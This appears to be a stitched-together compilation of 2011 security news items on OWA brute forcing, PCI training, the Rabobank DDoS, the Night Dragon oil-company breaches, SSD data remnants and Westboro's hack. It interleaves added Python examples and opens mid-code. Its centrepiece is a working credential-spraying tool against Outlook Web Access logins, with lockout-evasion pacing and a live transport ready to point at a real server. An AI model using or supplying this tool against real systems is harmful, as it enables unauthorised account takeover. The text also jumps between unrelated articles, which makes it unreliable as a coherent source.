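        # simulate the service pack: one file updated, one added, one removed
        put("kernel.bin", b"build 7601")
        put("newcomponent.bin", b"build 7601")
        os.remove(os.path.join(sysdir, "legacy.bin"))
        after = hash_tree(root)           # snapshot taken after the SP
        return diff_baseline(before, after)


if __name__ == "__main__":
    print(demo())
```

On a real test box you would run `hash_tree()` over the directories the whitelisting product covers, save the dictionary to disk, apply SP1, rehash and diff; the "modified" and "added" lists are exactly the files whose old checksums will no longer match.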
SecureState released a new module for the Metasploit Framework that allows users to brute force credentials on Microsoft OWA servers. The module, written in Ruby, forges HTTP requests (both GET and POST) to simulate a user logging into the web service. By checking the responses, the module determines whether the authentication succeeded and reports the information to the user. This is often useful on penetration tests when the attacker has a list of Active Directory users but no services that are using domain authentication.
The module that SecureState developed can be used to test credentials against both 2003 and 2007 servers. Because the module is implemented within the Metasploit Framework, it takes advantage of the features available within it such as logging credentials to the internal database. SecureState has submitted this module to the Metasploit Developers and is awaiting its integration with the Metasploit Trunk.
According to Matt Neely (@matthewneely), we should look for SecureState to release a new tool every week or two.
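The core of the module described above is the decision "did this forged login request succeed?", made purely from the HTTP response. The following is an added example in Python, not SecureState's Ruby module: `classify()` inspects the status, `Location` header and cookies of the response to the forged POST, and `spray()` runs one password across a list of users. That last point is the practitioner's caveat the post leaves implicit: with a list of Active Directory users in hand, a per-user brute force trips the domain lockout threshold within a handful of guesses, so the usual approach is password spraying (one guess per account per pass). `simulated_owa()` is a constructed stand-in for the server so the code runs offline; its behaviour (failure redirects to `logon.aspx` with `reason=2`, success sets `sessionid`/`cadata` cookies and redirects into `/owa/`), the form field names, the host `mail.example.com` and the accounts are assumptions for the example, not facts taken from the page. `http_transport()` is the live replacement and is not exercised here.

```python
"""Credential check against an OWA forms-based login, with an offline model.

Added example, not SecureState's module. classify() encodes the decision the
post describes (inspect the response to the forged login request); spray()
runs one password across many users so Active Directory lockout thresholds
are not tripped. simulated_owa() is a constructed stand-in for the server.
"""
import time
import urllib.error
import urllib.request
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed accounts for the offline model; not real credentials.
_VALID = {"CORP\\alice": "Winter2011!", "CORP\\bob": "Passw0rd"}


def simulated_owa(form):
    """Stand-in for POST /owa/auth/owaauth.dll (OWA 2007 behaviour, assumed):
    a bad password redirects back to logon.aspx with reason=2; a good one sets
    the session cookies and redirects into /owa/."""
    if _VALID.get(form["username"]) == form["password"]:
        return 302, {"Location": "/owa/",
                     "Set-Cookie": "sessionid=0123; cadata=abcd"}
    return 302, {"Location": "/owa/auth/logon.aspx?url=https%3a%2f%2fmail.example.com%2fowa%2f&reason=2"}


def classify(status, headers):
    """Map the auth response to 'success', 'failure' or 'unknown'.
    Anything we cannot explain is 'unknown' so that a lockout page or WAF
    response is never misread as a plain failed guess."""
    location = headers.get("Location", "")
    cookies = headers.get("Set-Cookie", "")
    if status in (301, 302, 303):
        if "reason" in parse_qs(urlparse(location).query):
            return "failure"
        if "cadata=" in cookies or "sessionid=" in cookies:
            return "success"
    return "unknown"


def login_form(username, password, destination="https://mail.example.com/owa/"):
    """Fields the OWA 2007 logon page submits (field names assumed for the example)."""
    return {"destination": destination, "flags": "0", "forcedownlevel": "0",
            "trusted": "0", "username": username, "password": password}


def spray(transport, users, password, pause=0.0):
    """One password per pass across every user: at most one bad attempt per
    account per pass, which stays under any sane lockout threshold."""
    hits, unknown = [], []
    for user in users:
        status, headers = transport(login_form(user, password))
        verdict = classify(status, headers)
        if verdict == "success":
            hits.append((user, password))
        elif verdict == "unknown":
            unknown.append(user)          # stop and look before guessing again
        time.sleep(pause)
    return hits, unknown


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib following the 302; the Location header itself is the signal."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_transport(auth_url):
    """Live transport for an engagement (not exercised offline):
    POST the form to e.g. https://mail.example.com/owa/auth/owaauth.dll."""
    opener = urllib.request.build_opener(_NoRedirect)

    def send(form):
        req = urllib.request.Request(auth_url, data=urlencode(form).encode(), method="POST")
        try:
            resp = opener.open(req, timeout=15)
            msg, status = resp.headers, resp.status
        except urllib.error.HTTPError as err:   # 3xx lands here because of _NoRedirect
            msg, status = err.headers, err.code
        headers = dict(msg.items())
        headers["Set-Cookie"] = "; ".join(msg.get_all("Set-Cookie") or [])
        return status, headers
    return send


if __name__ == "__main__":
    users = ["CORP\\alice", "CORP\\bob", "CORP\\carol"]
    print(spray(simulated_owa, users, "Passw0rd"))   # ([('CORP\\bob', 'Passw0rd')], [])
```

Swap `simulated_owa` for `http_transport("https://mail.example.com/owa/auth/owaauth.dll")` (your target, not a real host) to run it for real, keep `pause` well above zero, and treat any `unknown` verdicts as a signal to stop: they usually mean a lockout, a CAPTCHA or a WAF rather than a wrong password.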
The PCI Council has introduced a series of instructor-led PCI Awareness training courses for 2011, the first of which took place in San Francisco on February 18. Another in-person training seminar is slated for March 11 in London. “The awareness training is intended for anybody who wants to learn more about PCI”, said Bob Russo, general manager of the PCI Council. He told Infosecurity that the courses contain four modules that cover all PCI basics, including how the payment system operates straight through to how PCI works and why it is important to be compliant.
“We can say confidently that [PCI compliance] is the best defense you will have against a breach, but by no means is this the ceiling”, Russo added. “This is basically the minimum you should be doing – anything you can add to it is an additional layer that makes it more secure.” Source: http://news.idg.no/cw/art.cfm?id=3F6822FF-1A64-6A71-CE67724BB606D61C
The outage of Dutch bank Rabobank last weekend was caused by a massive DDoS attack. The perpetrators are still unknown. The bank has reported the attack to the police.
After two days of mystery surrounding the outage, Rabobank gave Dutch IDG title Webwereld a statement explaining the breakdown of both its website and its e-banking services. The Dutch bank was hit by a large DDoS (Distributed Denial of Service) attack. The outage happened Saturday evening and again Sunday afternoon. The website and e-banking services were inaccessible to desktop and mobile users.
The DDoS attack also caused an outage in the Dutch central payment system iDeal. That alternative to PayPal was flooded with returned transaction messages from the attacked bank, and this secondary denial of service caused the payment system to go partially down. A spokesperson for iDeal operator Currence told Webwereld that the buffer of one of its two platforms filled up. Banks connected to the affected platform were also unable to process iDeal payments.
Rabobank has now stated that it was under attack by unknown parties. The website Rabobank.nl was bombarded with large amounts of traffic and subsequently collapsed. This was done with intent, says the bank, and it will therefore file a police report about the DDoS attack. A spokesman could not tell Webwereld where the attack originated. “That is part of the investigation, about which we will make no statements.”
The bank already suspected that the outage was caused by malicious intent, but did not voice this suspicion publicly until Tuesday evening, after it had confirmed the cause of the breakdown. Questions from Webwereld about the nature of the problem and the countermeasures had therefore gone unanswered until then.
Rabobank’s e-banking service was unreachable on both Saturday and Sunday. To deflect the attack, Rabobank altered the DNS (domain name system) records for its website. As a result the site was unreachable for the attackers, but also for the general public.
Dutch customers of the bank complained that the site and e-banking system were still down long after the actual outage had been resolved. The bank was in discussions with local telecoms companies and internet providers to restore connectivity to Rabobank for their respective customers, which took until Monday. Customers outside the Netherlands were cut off until at least Tuesday afternoon.
Last week the centralized website of the Dutch government (Rijksoverheid.nl) was hit by a massive DDoS attack. A spokesperson told Webwereld that the attack originated “from a foreign country”, but declined to be more specific. The government website was offline for several hours. During that attack the website of the government agency Rijkswaterstaat (Rijkswaterstaat.nl) was also hit, albeit only for a short time. The government has filed a police report. Source: http://www.bloomberg.com/news/2011-02-24/exxon-shell-bp-said-to-have-been-hacked-through-chinese-internet-servers.html
Attackers from China broke into and stole proprietary information from the networks of six U.S. and European energy companies, including Exxon Mobil Corp., Royal Dutch Shell Plc and BP Plc, according to one of the companies and investigators who declined to be identified.
McAfee Inc., a cyber-security firm, reported Feb. 10 that such attacks had resulted in the loss of “project-financing information with regard to oil and gas field bids and operations.” In its report, Santa Clara, California-based McAfee, assisted by other cyber-security firms, didn’t identify the energy companies targeted. The attacks, which it dubbed “Night Dragon,” originated “primarily in China” and occurred during the past three years.
The list of companies hit, none of which disclosed the attacks in filings with regulators, also includes Marathon Oil Corp., ConocoPhillips and Baker Hughes Inc., according to the people who worked on or are familiar with the companies’ investigations and asked not to be identified because of the confidential nature of the matter.
Chinese hackers broke into the computer network of Baker Hughes, said Gary Flaharty, spokesman for the Houston-based provider of advanced drilling technology. Baker Hughes concluded the incident didn’t need to be disclosed because it wasn’t material to investors, he said, declining to comment further.
In some of the cases, hackers had undetected access to company networks for more than a year, said Greg Hoglund, chief executive officer of Sacramento, California-based HBGary Inc., a cyber-security company that investigated some of the security breaches at oil companies. Hoglund, who was cited by McAfee as a contributor to its report, declined to identify his clients.
“Legal information, information on deals and financial information are all things that appear to be getting targeted,” Hoglund said, summing up conclusions his firm made from the types of documents and persons targeted by the hackers. “This is straight up industrial espionage.”
Hackers targeted computerized topographical maps worth “millions of dollars” that show locations of potential oil reserves, said Ed Skoudis, whose company, Washington-based InGuardians Inc., investigated two recent breaches of U.S. oil companies’ networks. He declined to name his clients or the origin of the hackers.
The McAfee report described the techniques used to get into the energy company computers as “unsophisticated” and commonly used by Chinese hackers. The attacks began in November 2009, McAfee said. Two cyber investigators familiar with the probes said the attacks began even earlier — in 2008 — and involved several well-financed groups. The investigators asked not to be identified because the company investigations are private.
McAfee based the report on information gathered from its own work on the breaches and from others who were directly involved in investigating them. The report, produced on the condition that the affected companies not be identified, was done to “educate the community,” said Ian Bain, a McAfee spokesman.
The thefts of oil company data like those in the McAfee report match the profile of industrial espionage operations that have the backing or consent of the Chinese government, said Joel Brenner, former head of U.S. counterintelligence during the Bush and Obama administrations and now a lawyer with Cooley LLP in Washington. In his former post, one of Brenner’s jobs was tracking spying efforts against U.S. companies from foreign countries.
Even when next-generation storage devices report that files have been deleted, as much as 75 percent of the data they contained may still reside on the flash-based drives, according to the research, which is being presented this week at the USENIX FAST ’11 conference in California. In some cases the SSDs, or solid-state drives, incorrectly reported that files had been “securely erased” even though copies of the files remained in secondary locations.
The difficulty of reliably wiping SSDs stems from their radically different internal design. Traditional ATA and SCSI hard drives write data magnetically to a physical location that has a fixed relationship to its LBA, or logical block address, so overwriting the address overwrites the data. SSDs, by contrast, store data in NAND flash chips and employ an FTL, or flash translation layer, to map logical block addresses onto physical flash pages. Because a flash page cannot be overwritten in place, when data is modified the FTL frequently writes the new version to a different physical location and updates its map to reflect the change.
In the process, the old copy of the data, which the authors refer to as a digital remnant, remains in its original location until the drive eventually erases it.
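To make the remapping concrete, the following is an added example, a deliberately simplified model of an FTL written for this page, not the researchers' code and not how any particular controller behaves: a real drive works in pages grouped into erase blocks, keeps its map in private metadata and garbage-collects stale pages on its own schedule. The model is enough to show the two points the paper makes. A host-side "secure delete" that overwrites the LBA three times leaves the original page untouched and merely consumes three more pages, so a forensic read of the raw flash still finds the secret; only a firmware-level erase that clears every page removes it, and the paper found that some drives implement that command incorrectly.

```python
"""Toy flash translation layer (FTL) showing why host-side overwrites leave
remnants on an SSD. Added example, a simplified model, not the paper's code
or any real controller's behaviour."""


class ToyFTL:
    def __init__(self, pages=16):
        self.flash = [None] * pages   # physical pages; None = erased
        self.map = {}                 # LBA -> physical page currently mapped
        self.next_free = 0

    def _alloc(self):
        if self.next_free >= len(self.flash):
            raise RuntimeError("no erased page left; a real FTL would garbage-collect")
        page = self.next_free
        self.next_free += 1
        return page

    def write(self, lba, data):
        """Flash cannot overwrite a page in place, so every write lands on a
        fresh page and the map is repointed. The old page is now stale but
        still holds its contents."""
        page = self._alloc()
        self.flash[page] = data
        self.map[lba] = page

    def read(self, lba):
        """What the host sees through the LBA interface."""
        return self.flash[self.map[lba]] if lba in self.map else None

    def host_overwrite(self, lba, passes=3):
        """A host-side 'secure delete' tool: overwrite the LBA, repeatedly.
        Each pass is just another write to a new page."""
        for _ in range(passes):
            self.write(lba, b"\x00" * 8)

    def firmware_secure_erase(self):
        """A correctly implemented drive-level secure erase: every page is
        erased and the map is dropped. (The paper found some drives get this wrong.)"""
        self.flash = [None] * len(self.flash)
        self.map = {}
        self.next_free = 0

    def remnants(self, data):
        """Forensic view: raw pages still holding the payload, mapped or not."""
        return [i for i, page in enumerate(self.flash) if page == data]


def demo():
    secret = b"SECRET01"
    ftl = ToyFTL()
    ftl.write(7, secret)                       # secret lands on page 0
    ftl.host_overwrite(7, passes=3)            # pages 1..3 get zeros; page 0 untouched
    after_overwrite = {"host_view": ftl.read(7), "remnant_pages": ftl.remnants(secret)}
    ftl.firmware_secure_erase()
    after_erase = {"host_view": ftl.read(7), "remnant_pages": ftl.remnants(secret)}
    return after_overwrite, after_erase


if __name__ == "__main__":
    print(demo())
```

The host's view after the overwrite is all zeros, which is what a file-wiping utility verifies and reports as success; the raw flash still contains the secret on page 0. That gap between the LBA view and the physical view is the whole finding.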
Unsurprisingly, Westboro spokesperson Shirley Phelps-Roper attempted to downplay the incident, claiming that Anonymous had been trying to hack the site for at least several days.
“What they did was break into one server. They tried mightily for four days. They got nothing,” she said. “I’m [really quite] sure they worked it all out before.”
Meanwhile, a tweet from an Anonymous account offered some indication that the Westboro hack may have been slightly more difficult to pull off than the HBGary breach: “#WBC was more leet than #HBGary… It took #Anonymous a 0day to get in their network, not some public SQL.”
It should be noted that Westboro’s sites were recently knocked offline for a period of several days by an extensive DDoS campaign coordinated by The Jester.